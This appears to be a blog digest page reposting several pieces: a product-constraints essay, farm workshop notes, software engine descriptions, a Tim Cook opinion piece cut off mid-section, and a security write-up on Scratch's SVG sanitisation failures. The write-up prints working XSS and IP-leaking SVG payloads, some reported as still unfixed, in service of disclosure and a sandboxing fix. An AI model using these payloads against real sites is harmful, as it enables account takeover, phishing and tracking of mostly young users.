3 constraints before I build anything

Mike's Notes

Note

Resources

  • https://jordanlord.co.uk/blog/3-constraints/

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

08/05/2026

3 constraints before I build anything

By: Jordan Lord
Jordan Lord: 07/04/2026

Building radically simple, open tools and worlds through constraint-driven engineering.

These are the 3 constraints that I use before I start building anything. I'm a believer in constraints as an enabler for creativity. Constraints help us collapse the search space, and figure out innovative solutions to problems.

I've been a builder for 10 years, and I've built products that went nowhere because they were either too complex or had no identity. These are the constraints that I landed on after making those mistakes.

One page or it doesn't get built

This constraint limits complexity and ambiguity.

Write a one-pager for every idea. Your one-pager captures your north star. It's non-negotiable, precise, ambitious, and lean. Once written, it serves every type of communication: share it as a memo with investors, contributors, team members, friends, or family.

When working collaboratively on a product, there will always be points of contention and conflict, and it can sometimes be difficult to know which battles to pick. If something is not in the one-pager, then it's either not worth fighting over, or the one-pager ought to be amended to include it.

A one-pager is not only useful for communication; it's useful for organising your own thoughts. If you can't fill one page, don't fill the gaps with fluff; it means you're not ready to build. First research, plan, and prototype, then write the one-pager again. Iterate. If it requires more than one page, it's too complex: don't build it.

The core tech must be separable from the product

This constraint limits you to ideas that have real leverage and originality.

Develop a core piece of technology that supports your product but is not the product itself. The core tech is a method, skill, tool, or even another product that supports what you're doing today yet must survive without it. It's a form of reusable IP.

Why? Separating the core tech forces you to think beyond the product you're building. Products pivot in direction all the time, while your core tech is constant and compounding, and compounding efforts have non-linear gains over longer time horizons. Linus Torvalds developed Git to improve the Linux kernel development workflow. HashiCorp has HCL (HashiCorp Configuration Language). Google has Kubernetes. But you don't need big-tech resources to build core tech: it could be a library that you extract from your codebase, or even a methodology that you refine and commit to.

Your core tech is your long-term commitment. It is independent of your product's direction, but it must be aligned with your own or your company's long-term vision. If your idea doesn't enable core tech, then it isn't high enough leverage.

One defining constraint must shape the product

This constraint limits feature creep and forces identity.

Define your own constraint and put it front and centre in your product, so that the user sees and interacts with it all the time. It is obvious, and it is what gives your product its identity. A good constraint gives your product a feel; it permeates every part of the user experience. Minecraft is built entirely from blocks. IKEA is flat-pack, self-assembly furniture.

The constraint you choose limits scope by reducing your decision space, letting you concentrate on the problems that really make the difference. If you don't choose a constraint, or choose a bad one, you will build a bloated product that tries to do everything. The design of your product will "fall out" of a well-designed constraint. And just as in your product, your constraint must be front and centre in your one-pager.

Closing Rule

When it comes to deciding what to build, if it fails any of these constraints, then I don't build it.

Everything to Gain from Thriving Southland

Mike's Notes

My notes from an all-day workshop organised for farmers, which I attended yesterday.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Thriving Southland
  • Home > Handbook > 

Last Updated

08/05/2026

Everything to Gain from Thriving Southland

By: Mike Peters
On a Sandy Beach: 07/05/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

I attended the all-day workshop "Everything to Gain" on 6 May 2026 at the Ascot Park Hotel in Invercargill, New Zealand, organised by Thriving Southland.

It was a day full of informative speakers on the global agricultural market, attended mainly by working farmers.



I learned a great deal from the objective data presented and from chatting with the farmers at our table. Hard times are ahead.

Thinking visually while listening

I mentally ran the Workspaces for Agriculture, testing the model's assumptions against what I learned.

I also did a brain dump, creating 12 A4 drawings and working through the variable problems in the current Pipi Core buildout.

Lessons I learned

Shifting a working Pipi 9 from a laptop to a data centre led to several unexpected consequences.

I underestimated the impact of:

  • The naming, generation, and pub/sub of variables.
  • Host environment.
    • OS
    • Java
    • CFML Engine
  • Needing to turn Pipi into 4 separate role-based editions, which then exposed some hidden problems.
  • Adding a nest structure between Pipi and the host environment.
  • The impact of all of the above when each engine can pub/sub and be both deterministic and probabilistic, with multiple copies of each engine, and many in different locations.
  • Path length constraint in Windows vs Linux.

This very hard problem can only be solved by running a simulation of all 18 engines in parallel and watching the interaction. Lots of feedback loops.

Yesterday, a lot of progress was made visually in answering these questions. The variable-naming convention used for the past 12 months has held up, despite some earlier false alarms.

  • More work is needed on variable distribution rules (messaging) for automation.
    • Global
    • Local
    • etc

Today I did another 8 drawings, this time of the Messaging Engine (msg) routing variables between the engines in both deterministic and probabilistic modes.
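The routing idea described above can be illustrated with a toy publish/subscribe bus. This is a hypothetical sketch, not Pipi's actual Messaging Engine; the engine names and variable name are made up for the example.

```javascript
// A toy publish/subscribe bus, only to illustrate engines publishing
// variables and a messaging engine routing them to subscribers.
class MessageBus {
  constructor() {
    this.subscribers = new Map(); // variable name -> list of handlers
  }
  subscribe(variableName, handler) {
    const list = this.subscribers.get(variableName) ?? [];
    list.push(handler);
    this.subscribers.set(variableName, list);
  }
  publish(variableName, value) {
    // Deterministic mode: deliver to every subscriber, in order.
    for (const handler of this.subscribers.get(variableName) ?? []) {
      handler(value);
    }
  }
}

const bus = new MessageBus();
const received = [];
// e.g. a logging engine subscribing to a variable another engine owns
bus.subscribe('cms.page.count', (value) => received.push(value));
// e.g. the owning engine publishing an update
bus.publish('cms.page.count', 42);
// received is now [42]
```

A probabilistic mode could be layered on top by having `publish` deliver to a weighted random subset of subscribers instead of all of them.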


I will sleep on all this for a few days to see if anything else pops out, then commit it to code.

The woes of sanitising SVGs

Mike's Notes

MIT Scratch is a really great way to learn to code visually. This is a great article by Thomas Weber about some SVG-handling problems in Scratch that need fixing.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

07/05/2026

The woes of sanitising SVGs

By: Thomas Weber
Muffin Ink: 11/04/2026

Worked on TurboWarp, Scratch Addons, forkphorus.

Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (i.e. attacker-controlled) content into an <svg> element and appends it to the main document for various operations (e.g. measuring the SVG bounding box more reliably than viewBox or width/height allow).

No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts.

I think Scratch's approach to SVG sanitization is doomed. To explain, we have to take a trip through the history of SVG sanitization in Scratch to see how well it has worked so far.

2019: XSS via <script> tag

In 2019, a few months after the initial release of Scratch 3, Scratch discovered that SVGs can contain <script> tags that it would execute when the SVG loads. This is known as an XSS (cross-site scripting) vulnerability.

In Scratch terms, an XSS allows an attacker to take actions on behalf of anyone that loads their project. For example, the attacker can post comments, delete projects, or otherwise try to take over the victim's account. In Scratch Desktop, XSS is elevated to arbitrary code execution because Scratch Desktop enables Electron's dangerous Node.js integration feature. (TurboWarp Desktop has not enabled that feature since v0.2.0 from March 2021)

Example from Scratch's test suite:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
      alert('from the svg!')
  ]]></script>
</svg>

This was fixed by using a regular expression to remove script tags.
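The kind of regex-based removal described above can be sketched as follows. This is an illustrative reconstruction, not Scratch's actual code, but it demonstrates the exact case-sensitivity hole that the next section describes.

```javascript
// A naive, case-sensitive regex filter of the kind described above
// (an illustrative sketch, not Scratch's real implementation).
function stripScriptTags(svgText) {
  return svgText.replace(/<script[\s\S]*?<\/script>/g, '');
}

const lower = '<svg><script>alert(1)</script></svg>';
const upper = '<svg><SCRIPT>alert(1)</SCRIPT></svg>';

stripScriptTags(lower); // script tag removed
stripScriptTags(upper); // <SCRIPT> survives: the regex only matches lowercase
```

Even a case-insensitive version would still be insufficient, since inline event handlers such as onerror embed JavaScript without any <script> tag at all.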

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2020: XSS via oversights in previous fix (CVE-2020-7750)

In 2020, apple502j discovered that XSS is still possible. It turns out that the previous fix is utterly defective and can be bypassed by capitalizing <SCRIPT> because the regex is case-sensitive, among several other ways to bypass it. Even if the regex were implemented correctly, it would still not work because there are other ways to embed JavaScript in an SVG. For example, one can use an inline event handler:

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>

This was fixed by using DOMPurify to remove scripts from the SVG before scratch-svg-renderer appends it into the document.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2022: HTTP leak via <image> href

In 2022, it was discovered that using the href property on an <image> element, an attacker can create an SVG that will invoke an external request when it is loaded. It turns out that while DOMPurify removes executable code, it does not protect against HTTP leaks because "there are too many ways of doing that and our tests showed that it cannot be done reliably".

In Scratch terms, an HTTP leak means that a Scratch user can log the IP of anyone that loads their project, possibly revealing information such as location or school district. The victim would not need to click on any links; the IP log happens just by loading the project. Scratch seems to consider this a security bug, and I agree.

Example:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/ping"/>
</svg>

This was fixed by adding DOMPurify hooks to remove href properties from all elements if the URL refers to a remote website.
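The core decision that such a hook has to make is whether an href stays local or reaches a remote server. The helper below is hypothetical, not Scratch's actual hook code, and only sketches that classification.

```javascript
// Hypothetical classifier: does this href point at a remote origin?
// Fragment references (#id) and data: URLs are considered local/safe.
function isRemoteHref(href) {
  if (href.startsWith('#') || href.startsWith('data:')) return false;
  try {
    // Resolve relative URLs against a placeholder local base.
    const url = new URL(href, 'https://localhost/');
    return url.origin !== 'https://localhost';
  } catch {
    return true; // unparseable URL: treat as unsafe
  }
}

isRemoteHref('https://example.com/ping'); // remote: true
isRemoteHref('#myGradient');              // local fragment: false
```

In a real DOMPurify hook, a check like this would run on every href/xlink:href attribute and strip the attribute when it returns true.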

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2023: HTTP leak via CSS @import

In 2023, it was discovered that using a CSS @import statement inside of a <style> element, an attacker could create a project that invokes external requests when the project loads. Example:

<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    @import url("https://example.com/ping");
  </style>
</svg>

This was fixed by integrating a CSS parser written in JavaScript to remove dangerous parts of the CSS. They would parse all stylesheets contained in SVGs, remove any @import statements, and convert the CSS back to a string if any changes were made so that the dangerous stuff is removed.
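The @import removal can be sketched with a deliberately simplified regex; the real fix used a full CSS parser, and this hypothetical version exists only to show the shape of the operation.

```javascript
// Simplified sketch of @import removal. The actual fix parsed the CSS
// into a syntax tree rather than using a regex.
function stripCssImports(cssText) {
  // Remove each @import statement up to its terminating semicolon.
  return cssText.replace(/@import[^;]*;/gi, '');
}

const css = '@import url("https://example.com/ping"); .a { fill: red; }';
stripCssImports(css); // @import gone, the .a rule is kept
```

As the later sections of this post show, @import is only one of many CSS vectors for external requests, which is part of why this layered approach kept failing.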

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2024: XSS via Paper.js

In 2024, I discovered an XSS in Paper.js, a library Scratch uses in the costume editor. It turns out that while Scratch sanitized SVGs before working on them in scratch-svg-renderer, unsanitized SVGs were still being passed to Paper.js. This has largely the same impact as the 2020 scratch-svg-renderer XSS, but occurs when using the costume editor instead of when initially opening a project. Example:

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" data-paper-data="any invalid JSON">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>

This was somewhat fixed on an extremely delayed timeline by extending the existing SVG sanitization code to run when loading an SVG, not just when processing it in scratch-svg-renderer. This means that Paper.js will only receive SVGs that have already been sanitized.

I say "somewhat fixed" because I'm not sure if that sanitization ever runs for server-downloaded SVGs. Scratch support told me they "have protections against this that are handled on our server side" which may make that redundant. I have never seen any evidence of such protections while developing proof-of-concepts, but maybe they are real.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2025: HTTP leak via CSS url()

In 2025, it was discovered that using url() inside of certain CSS rules, an attacker can create an SVG that will invoke an external request when it is loaded. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!-- inline style -->
    <rect style="background-image: url(https://example.com/ping)" />
    <!-- can also use a <style> element -->
    <style>
        .img {
            background-image: url("https://example.com/ping");
        }
    </style>
    <rect class="img" />
</svg>

This was fixed by substantially expanding the SVG sanitization code to also search for any usage of url() and remove any styles or attributes referencing external URLs.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2026: HTTP leak via several bugs in the previous code

In 2026, it was discovered that using url() inside of certain CSS rules, it is still possible for an attacker to create an SVG that will invoke an external request when it is loaded. It turns out there were at least three unique bugs that each allowed an HTTP leak:

  • Did not account for CSS allowing one to write out url(...) using escape codes
  • Did not handle a style attribute having more than one url(...) inside it, where the first one is safe but the second one is not
  • Did not handle url() defined in a CSS variable and referenced via var(--name)

Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <circle fill="\75\72\6c(https://example.com/ping)" />
    <rect style="/* url(#safe_url) */ background-image: url(https://example.com/ping)" />
    <style>
        :root {
            --example: url(https://example.com/ping);
        }
        .img {
            background-image: var(--example);
        }
    </style>
    <rect class="img" />
</svg>

This was fixed by adding a substantial amount of additional complexity around code that was already way too complex.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

2026: Full page restyling via long transitions

In 2026, it was discovered that through clever use of very long transitions and forcing the browser to restyle all elements, an attacker can apply arbitrary styles to the full Scratch page that last until refresh. Most uses of this have been "fun" things, but here are a few ideas about more evil things you might be able to do:

  • Hiding the report button.
  • Making the like/favorite buttons cover the entire page, so that users are tricked into clicking them.
  • Displaying text telling the user that they need to open a website in a new tab to "verify" their account (some phishing page). Users are likely to trust the instructions because the message is coming from the real scratch.mit.edu.

Example project (not mine): https://scratch.mit.edu/projects/1299571218/

This will probably get fixed at some point, but today what you'll see is this:

[Screenshot: Scratch project page, but all the page background colors are very obviously wrong.]

This project uses two SVGs. The first one is the "trigger":

<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Trigger
  </text>
  <style>
    /* Force browser to recalc styles to activate first SVG */
    *, * *, * * *, * * * * {
      transform: translateX(1px) scale(10000) rotateY(45deg) perspective(1cm) !important;
      transition: all 9999s ease !important;
      filter: blur(0px) !important;
    }
  </style>
</svg>

The second one contains the styles to display:

<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Styles
  </text>
  <style>
    /* Global background blue */
    * {
      background-color: blue !important;
      color: white !important;
    }
    /* Project instructions/description styling */
    .project-description, .instructions-container {
      background-color: yellow !important;
      color: black !important;
      border: 10px solid red !important;
      transform: scale(1.1) !important;
    }
  </style>
</svg>

I won't pretend to fully understand what's going on here or why it works non-deterministically, but my general understanding is:

The trigger SVG applies transform and filter to every element in the document to forcibly make the browser recompute all styles right away, applying styles from the other SVG.

The trigger SVG applies a very long transition so that when the other SVG is removed, the styles will stick around for the duration of the "transition".

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

2026: HTTP leak via image-set()

I reported this one to Scratch in 2025. They didn't fix it, so whatever, I'll disclose it here. Any reasonable disclosure period lapsed 6 months ago.

Instead of using url(), an attacker can use image-set() to create an SVG that will invoke an external request when it is loaded. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        image-set(...) can cause external resources to be requested without using url() at all.
    -->
    <style>
        .image-set-with-string-url {
            background-image: image-set("https://example.com/ping" 1x);
        }
    </style>
    <rect class="image-set-with-string-url" />
    <!--
        image-set(url(...)) works the same as image-set(...).
        This already gets blocked by the existing sanitization.
    -->
    <style>
        .image-set-with-inner-url-function {
            background-image: image-set(url(https://example.com/ping) 1x);
        }
    </style>
    <rect class="image-set-with-inner-url-function"></rect>
    <!--
        image-set() can also be used in inline style attributes.
    -->
    <rect style="background-image: image-set('https://example.com/ping' 1x)" />
</svg>

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

20XX: HTTP leak via new CSS features

I also reported this one to Scratch in 2025. This bug actually doesn't work today, but will in the future if browsers ever implement all of CSS Units Level 4 or CSS Images Level 4. Today, Ladybird is the only browser to implement either of these, but major browsers could implement them someday as well.

Instead of using url(), an attacker can use src() or image() to create an SVG that makes an external request when it loads. Examples:

<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        Everything in this file relies on features that are defined in the browser specs, but not yet implemented in any browser.
        In theory, future browsers might initiate requests when they see these styles.
    -->
    <!--
        CSS Units Level 4 defines src(...) as an alternative to url(...).
        Unlike url(), src()'s URL can be any expression, not just a constant string.
        Reference: https://www.w3.org/TR/css-values-4/#example-a2ee15a6
        Not implemented by any major browser today. (Only implemented in the experimental Ladybird browser)
    -->
    <style>
        .src-constant {
            background: src('https://example.com/ping');
        }
        .src-variable {
            --url: 'https://example.com/ping';
            background: src(var(--url));
        }
    </style>
    <rect class="src-constant" />
    <rect class="src-variable" />
    <!--
        CSS Images Level 4 defines image() as an alternative to url() for images.
        Reference: https://www.w3.org/TR/css-images-4/#image-notation
        Not implemented by any major browser today.
    -->
    <style>
        .image {
            background: image('https://example.com/ping', black);
        }
    </style>
    <rect class="image" />
    <!-- Same as above examples, but using inline styles -->
    <rect style="background: src('https://example.com/ping');" />
    <rect style="--url: 'https://example.com/ping'; background: src(var(--url));" />
    <rect style="background: image('https://example.com/ping', black);" />
</svg>

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

This is unsustainable

Stacking more and more complexity into sanitization is clearly a doomed approach. We are more than 5 major revisions deep and yet there are still known holes. People are actively sharing projects on the Scratch website bypassing SVG sanitization. And the moment browsers decide to implement the latest CSS specs, even more holes will open up.

Furthermore, not all of these problems have clear solutions. For full page styling, both SVGs seem completely benign: there is no JavaScript or references to external resources. The fix would likely be to remove transition styles since the transitions would never run in Scratch anyway, but are you sure that's sufficient? Will you remember to also remove all the vendor-prefixed versions of transition? What about animation styles?

Some other possible cases that might allow more bypasses in the future:

css-tree (the library Scratch uses to parse CSS) and the real CSS parsers in browsers might not completely match. If so, css-tree might parse CSS such that everything looks fine and thus nothing gets removed, but then the browser's real parser does recognize external content.

Advanced new CSS features such as @property or native nesting that css-tree versions might not be able to meaningfully parse without constant updates.

Browsers can always add new functions that can reference external content as they have already done with image-set() and the spec implies will happen for src() and image(). How will you keep up with the constant change in these specs to evaluate every new function and see if it could somehow allow referencing external content?

An alternative

TurboWarp (a Scratch fork I work on) was unaffected by the 2026 HTTP leaks and full page restyling issue. This isn't because I found all the clever ways for an SVG to do something bad; in fact I actually deleted the CSS sanitization code entirely to make packaged projects 400KB smaller.

I implemented an alternative approach: sandboxing the SVG inside an iframe. First, we set up an iframe with a sandbox attribute of allow-same-origin. This blocks script execution inside the iframe while still letting us interact with the contents inside.

Second, we set up the iframe with the following hardcoded HTML:

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
    </head>
    <body></body>
</html>

The inline Content-Security-Policy is set up to block all scripts and only allow loading safe resources from safe data URLs. We also still use DOMPurify to remove obviously evil things from the SVG. We then put the iframe into the document offscreen somewhere so that the measurement APIs Scratch needs will still work.
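Putting the pieces together, the setup looks roughly like the sketch below. The browser-side lines are shown as comments because they need a DOM; the helper simply builds the hardcoded sandbox document quoted above.

```javascript
// Rough sketch of the sandbox setup. In a browser you would do:
//   const frame = document.createElement('iframe');
//   frame.sandbox = 'allow-same-origin'; // no allow-scripts => no JS
//   frame.srcdoc = sandboxDocument();
//   document.body.appendChild(frame);    // positioned offscreen
// and then run measurement APIs against the iframe's contents.
function sandboxDocument() {
  return `<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
    </head>
    <body></body>
</html>`;
}
```

The key design choice is that the browser's own CSP and sandbox enforcement do the blocking, rather than hand-written sanitization code.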

This approach gives us some very nice properties:

The browser uses its pre-existing code to do the hard part for us.

TurboWarp doesn't need to know about all the ways for an SVG to make a request. Your browser already knows this and will enforce it for any new APIs that get added.

Real-world CSP implementations are not perfect and have holes. However, those holes generally are weird edge cases that require the attacker to already be executing JavaScript in some way. Those vulnerabilities are also considered browser security issues so they have bug bounties attached to them.

The SVG can't affect the main document.

Consider the case of the full page restyling. Because the SVG is trapped inside of an iframe, the only thing it can restyle is the iframe. The styles in the iframe do not matter, so that's perfectly fine.

You can find our code here:

scratch-svg-renderer fork

paper.js fork

Maybe you can do some other interesting stuff with shadow DOM or other web APIs, but we found that the iframe is working fine for us.

The below sections will cover any new issues I become aware of after publication.

2026-04-12: Claude finds HTTP leak via CSS nesting relaxed syntax

After publishing this, I was curious how good current language models are at finding these bugs. I told Claude Opus 4.6 to clone the scratch-editor repo, look at the recent SVG renderer changes, and see if there were any holes. The results were interesting:

Claude discovered on its own that image-set(...) is not sanitized and can cause HTTP leaks.

Claude discovered a new issue not described in the original version of this post.

The bug involves CSS nesting, which can appear in two forms. The nested style can prefix the selector with an & or instead just not prefix it (the latter being known as "relaxed" syntax). Modern browsers interpret both of the below identically.

g {
    & rect {
        background-image: url(https://example.com/ping);
    }
}
g {
    rect {
        background-image: url(https://example.com/ping);
    }
}

css-tree is capable of parsing the &-prefixed version into a meaningful syntax tree that Scratch can sanitize. However, it turns out that css-tree does not know how to parse the relaxed version. The entire g { ... } block is parsed as a "raw text" node which Scratch's code will not sanitize. Full example SVG:

<svg xmlns="http://www.w3.org/2000/svg">
    <style>
        g { rect { background-image: url(https://example.com/ping); } }
    </style>
    <g><rect></rect></g>
</svg>

Earlier in this post, I mentioned that "css-tree and the real CSS parsers in browsers might not completely match". This is a real-world example of that kind of bug allowing CSS to bypass sanitization. Note that css-tree currently has 48 open issues and certainly many more unknown ones. I believe depending on css-tree to be a perfect parser is a hopeless path that will continue to result in more vulnerabilities. TurboWarp's SVG sandbox fixed this bug before I even knew it existed.

This is not fixed. The css-tree issue for this bug has been open since December 2023.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

Creating 18 Engine descriptions

Mike's Notes

18 working engines are currently being imported into Pipi Core, configured, and tested.

Alex has sent me a DeepSeek chat that generated descriptions of those engines and how they work together by analysing the existing web page "20 Engines". DeepSeek also produced a Mermaid diagram, written in Markdown, based on those descriptions. DeepSeek was only partially correct in some of the descriptions.

The Mermaid diagram was wrong, but what a great tool for Pipi to self-document with CL and accurate Markdown descriptions. It will be widely used in future as a plugin.

Feedback and suggestions are very welcome as always.

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library >
  • Home > Handbook > 

Last Updated

07/05/2026

Creating 18 Engine descriptions

By: Mike Peters
On a Sandy Beach: 06/05/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

Most Pipi engines have historically been poorly described. This is an attempt to write better descriptions for the 18 engines currently being imported. I had a go, then used Gemini to come up with better wording, then Mrs Grammarly did her bit. 😎

Much later, once the workspace UIs are working, a one-page summary of each engine can be written for the pipiWiki. The Wiki Engine (wik) in the resources above has an example of such a summary.

Descriptions

Each engine has:

  • A unique name and a unique 3-letter code.
  • S: A short description (under 100 characters), suitable for tooltips.
  • D: A description under 255 characters.
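The length and naming constraints above can be checked mechanically. This is a hypothetical helper, not part of Pipi, using the `sys` entry from the list below as sample data.

```javascript
// Check that an engine description entry fits the stated limits:
// a 3-letter lowercase code, S under 100 chars, D under 255 chars.
function validateEngineDescription({ code, short, description }) {
  return /^[a-z]{3}$/.test(code)
    && short.length < 100
    && description.length < 255;
}

validateEngineDescription({
  code: 'sys',
  short: 'System identity and lifecycle controller.',
  description: 'Manages the vital signs and lifecycle of Pipi\u2019s dynamic engine ecosystem.',
}); // => true
```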

System Engine (sys)

  • S: System identity and lifecycle controller.
  • D: Manages the vital signs and lifecycle of Pipi’s dynamic engine ecosystem, fostering complex emergent behaviours through seamless interaction.

Nest Engine (nst)

  • S: Host and environment interface bridge.
  • D: Serves as the foundational gateway between the host OS, Java, the application server, and the internal Pipi environment.

Namespace Engine (nsp)

  • S: Global identification and addressing.
  • D: Enforces a conflict-free global naming convention, ensuring every system element is uniquely addressable across the entire platform.

Render Engine (rnd)

  • S: Static file and asset rendering.
  • D: Processes and renders static resources, including HTML, CSS, source code, and databases.

Template Engine (tem)

  • S: Reusable pattern templates.
  • D: Manages reusable structural pattern templates used by the CMS to generate database-driven pages and components.

Variables Engine (var)

  • S: Centralised variables library.
  • D: Provides a centralised repository for managing variables used across templates, system configurations, and executable logic.

Log Engine (log)

  • S: Universal logging and telemetry controller.
  • D: Aggregates and configures logging parameters across all active engines to provide system-wide transparency and diagnostics.

Data Engine (dta)

  • S: Database lifecycle and CRUD operations.
  • D: Generates SQL to command the creation, evolution, and deletion of databases and their underlying data objects with full administrative control.

Configuration Engine (cnf)

  • S: Engine blueprint and manufacturing settings.
  • D: Supplies the precise DNA and configuration parameters required for the automated fabrication of individual Pipi engines.

Versioning Engine (ver)

  • S: Semantic versioning and update tracker.
  • D: Maintains system integrity by aggregating incremental updates from all engines into a unified semantic versioning timeline.

Code Engine (cde)

  • S: Internal code generation.
  • D: Facilitates automated code generation, including class libraries and logic synthesis directly within the Pipi platform.

Conductor Engine (cnd)

  • S: Internal process regulator.
  • D: Operates as the high-level orchestrator for major internal system processes and synchronisation.

Directory Engine (dir)

  • S: CMS file system and path manager.
  • D: Manages the logical and physical file system directories generated and utilised by the CMS.

Node Engine (nde)

  • S: Hierarchical template tree architect.
  • D: Maintains the addressable tree structure of templates to define content hierarchy within the CMS.

CMS Engine (cms)

  • S: Digital content management.
  • D: Powers the end-to-end lifecycle of digital content, from initial creation and editing to final publishing.

Core Engine (cor)

  • S: Primary system driver and logic hub.
  • D: The central engine that powers fundamental system behaviours and executes the primary logic that keeps Pipi running.

Factory Engine (fac)

  • S: Automated engine fabrication.
  • D: Assembles and deploys engines based on stored configuration files and real-time updates.

Page Engine (pge)

  • S: Semantic relationship and metadata mapper.
  • D: Maps external relationships for pages, managing keywords, references, and "See Also" semantic connections.

Tim Cook is Leaving. Good.

Mike's Notes

The key takeaway of this copied article.

"make products you’d be proud to use yourself."

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > Amazing CTO
  • Home > Handbook > 

Last Updated

05/05/2026

Tim Cook is Leaving. Good.

By: Tony Mattke 
Router Jockey: 27/04/2026

I’m Anthony Mattke, aka Tony. I’m a network engineer, infrastructure architect, and general-purpose technology geek located amidst the endless cornfields of north central Indiana. I’m a husband and father, and I hope to have superpowers one day. Seriously.

Your AirPods just connected to the wrong device. Again.

iMessage is taking twenty minutes to sync a message between your laptop and your phone sitting six inches apart. HomeKit forgot the kitchen lightbulb exists, and will remember it again in three hours like nothing happened. System Settings, which used to be one of the cleanest preferences UIs ever shipped, now feels like a bad Electron app pretending to be macOS.

These aren’t dramatic failures. They’re worse than dramatic failures. They’re daily proof that somewhere along the way, Apple stopped caring about the texture of using its own products.

This is Apple in 2026. And this is the Apple that Tim Cook built.

Cook announced his departure last week, and most of the coverage you’ll see is going to be a victory lap. A lot of it is earned. Apple is a three-trillion-dollar company. Services revenue is at record highs. Apple Silicon is one of the great hardware bets of the last decade. He took a company already at the top of its industry and made it bigger than the GDP of most countries.

So why am I glad he’s leaving? Because somewhere in all that growth, Apple stopped making products it was proud of.

What Steve Actually Said

There’s a passage in Walter Isaacson’s biography of Steve Jobs that gets quoted less than the famous ones. Jobs talked about how great companies die, and his theory was that the rot has nothing to do with competition or markets or innovation cycles. The rot starts when the salespeople end up running the company.

He named names. He pointed at IBM under John Akers. He pointed at Microsoft under Ballmer. He even pointed at the Sculley era of his own Apple as the cautionary tale. The phrase Jobs kept circling back to was that the people running these companies eventually “have no conception of a good product versus a bad product.” They can’t tell the difference. They can run a supply chain better than anyone alive, but they couldn’t tell you whether the radius on a button looks right.

That’s not a small criticism. That’s the founder of Apple, on the record, naming the disease and warning the company against catching it.

Then, in 2011, Apple promoted its head of operations to CEO.

I’m not saying Cook was a bad pick at the time. He was the right person to keep the trains running while everyone caught their breath after losing Steve. But fifteen years later it’s worth asking the question Steve himself would have asked. What kind of products are we shipping now?

The Tenet Cook Forgot

Of all the things Steve Jobs believed about Apple, one of them stands out as the most quietly violated under Cook: make products you’d be proud to use yourself.

Not just sell. Not just ship. Use. Sit down at the Mac on a Tuesday night, put your AirPods in, fire off a Message, set up a HomeKit automation, and feel proud of every single one of those things working the way you wanted them to.

Today’s Apple doesn’t pass that test. And the failures aren’t dramatic ones. They’re the small, persistent, daily-friction kind that the founder used to personally drive teams to fix.

You know the list. The 2022 System Settings redesign managed to take a perfectly usable preferences app and ship it as something worse, then leave it that way for three OS releases and counting. Notifications have been re-architected three times in five years and still work inconsistently across iOS, iPadOS, and macOS. Mail rules have been broken since the Obama administration. The Photos library will quietly drop items, sync ghosts, and offer no diagnostics when something goes wrong. HomeKit loses devices the way a child loses socks. Spotlight returns stale results and pauses for seconds at a time on hardware that should make it instant.

Each one of these, on its own, is just a bug. Together, they’re a culture.

They survive because they don't move metrics. They don't reduce revenue. They don't show up in the quarterly. But they're exactly the kind of paper cuts that would have annoyed Steve at 9pm on a Tuesday, and they would have been fixed by Wednesday morning.

That’s the difference. Steve used the products. Cook signs the budget.

Before Someone Says This Is Just Nostalgia

